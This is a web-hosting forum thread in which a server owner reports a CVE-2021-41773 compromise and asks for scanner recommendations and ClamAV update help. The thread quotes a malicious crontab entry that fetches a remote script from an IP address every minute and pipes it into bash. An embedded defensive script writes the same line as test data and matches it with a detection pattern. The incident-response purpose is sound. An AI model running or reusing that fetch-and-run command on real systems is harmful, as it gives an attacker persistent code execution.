Server hit by CVE-2021-41773

Operating System & Version
CentOS 7
cPanel & WHM Version
11.98.0

mvandemar

Well-Known Member
Jun 17, 2006
I was scanning all of my clients' servers for suspicious crontab entries as described in this article:


All came back clean aside from 1:

Code:
# cat /var/spool/cron/myuser
* * * * * wget -q -O - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1
The server has been running Apache/2.4.51 since Oct 28th so I know the original vulnerability no longer exists, but the script referenced in the crontab is no longer accessible so I have no idea what it did, or what other backdoors may have been created and accessed since this event. I did see that IP address and the script referenced in this article, indicating it was probably/possibly a cryptominer that was dropped, but I don't know how to tell for certain:


Do you guys have any recommendations for scanners to see what else may have happened? Are there built-in scanners in cpanel aside from clamav? Has anyone tried Lynis, or know anything about them?


Any other recommendations?

Thanks.

-Michael
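The crontab sweep the post describes can be scripted so that every server is checked the same way. The script below is an added example written for this thread, not something from the original post or from cPanel: it walks a cron spool directory, skips comment lines, and reports every entry shaped like the one quoted above (a downloader whose output is piped straight into sh or bash). The spool directory it scans is constructed inline for the demonstration; on a real CentOS/cPanel box you would point scan_cron_dir at /var/spool/cron and also at /etc/cron.d. The pattern is deliberately narrow and is an assumption about what "suspicious" means here; extend it for your environment.

```shell
#!/bin/sh
# Added example (not from the thread): report cron entries that download a
# remote script and pipe it straight into a shell, the shape of the entry
# quoted in the post. Assumes POSIX sh and grep -E. The spool directory used
# below is constructed for the demo; on CentOS the real per-user crontabs
# live under /var/spool/cron.

# downloader (wget/curl) ... '|' ... sh or bash; extend for your environment
SUSPICIOUS_PATTERN='(wget|curl)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'

# strip_comments FILE -> the file's non-comment lines (never fails)
strip_comments() {
    grep -Ev '^[[:space:]]*#' "$1" || true
}

# count_suspicious DIR -> prints how many matching entries the directory holds
count_suspicious() {
    n=0
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        # grep -c exits 1 when the count is 0, so keep the count and ignore the status
        c=$(strip_comments "$f" | grep -Ec "$SUSPICIOUS_PATTERN" || true)
        n=$((n + c))
    done
    echo "$n"
}

# scan_cron_dir DIR -> prints "file: entry" per match; exit 0 if any found, 1 if none
scan_cron_dir() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        strip_comments "$f" | grep -E "$SUSPICIOUS_PATTERN" | while IFS= read -r line; do
            printf '%s: %s\n' "$f" "$line"
        done
    done
    [ "$(count_suspicious "$1")" -gt 0 ]
}

# make_sample_dir -> creates a constructed spool directory and prints its path
make_sample_dir() {
    d=$(mktemp -d)
    # the entry quoted in the thread, in a crontab named after the affected user
    printf '%s\n' '* * * * * wget -q -O - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1' > "$d/myuser"
    # benign entries that also mention a shell or a downloader (constructed)
    printf '%s\n' \
        '# cPanel nightly update' \
        '0 3 * * * /usr/local/cpanel/scripts/upcp --cron' \
        '15 4 * * * curl -s https://example.invalid/status > /var/tmp/status.txt' \
        > "$d/root"
    echo "$d"
}

# demo run against the constructed directory; prints the one matching entry
SAMPLE=$(make_sample_dir)
scan_cron_dir "$SAMPLE" || echo "no suspicious entries"
rm -rf "$SAMPLE"
```

Run it as root so every user's crontab is readable, and treat a hit as a starting point for the rest of the investigation (what the user's account has written to disk, what is listening, what is in the shell histories), not as the whole answer: a crontab entry of this shape is the persistence mechanism, not the payload.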
 

cPanelAnthony

Administrator
Staff member
Oct 18, 2021
Houston, TX
cPanel Access Level
Root Administrator
Hello! You might want to try Imunify. Other than that, it might be worth reaching out to your sysadmin or web hosting provider for advice.

 


mvandemar

Well-Known Member
Jun 17, 2006
I installed clamav from the WHM dashboard, and when I went to run it I got the following message:

Code:
# /usr/local/cpanel/3rdparty/bin/freshclam
ClamAV update process started at Mon Nov 22 17:47:24 2021
WARNING: Your ClamAV installation is OUTDATED!
WARNING: Local version: 0.101.5 Recommended version: 0.103.4
DON'T PANIC! Read https://www.clamav.net/documents/upgrading-clamav
main.cvd is up to date (version: 62, sigs: 6647427, f-level: 90, builder: sigmgr)
daily.cvd is up to date (version: 26361, sigs: 1947102, f-level: 90, builder: raynman)
bytecode.cld is up to date (version: 333, sigs: 92, f-level: 63, builder: awillia2)
Is there a reason that cpanel would be installing an older version? Is this a copy meant specially for cpanel, or is it safe to update it to the latest?

Thanks.

Edit: when I look in yum it does show the newest version, but it doesn't think clamav is even installed, so it does appear to be specific to the cpanel plugin version of clamav. Any idea why that would be out of date? I don't see a way to update it in cpanel, it just shows that it uses the older version.

Edit #2: Are there any issues with running OSSEC+ on a cpanel machine? Does anyone have any experience with this? Thanks.

-Michael
 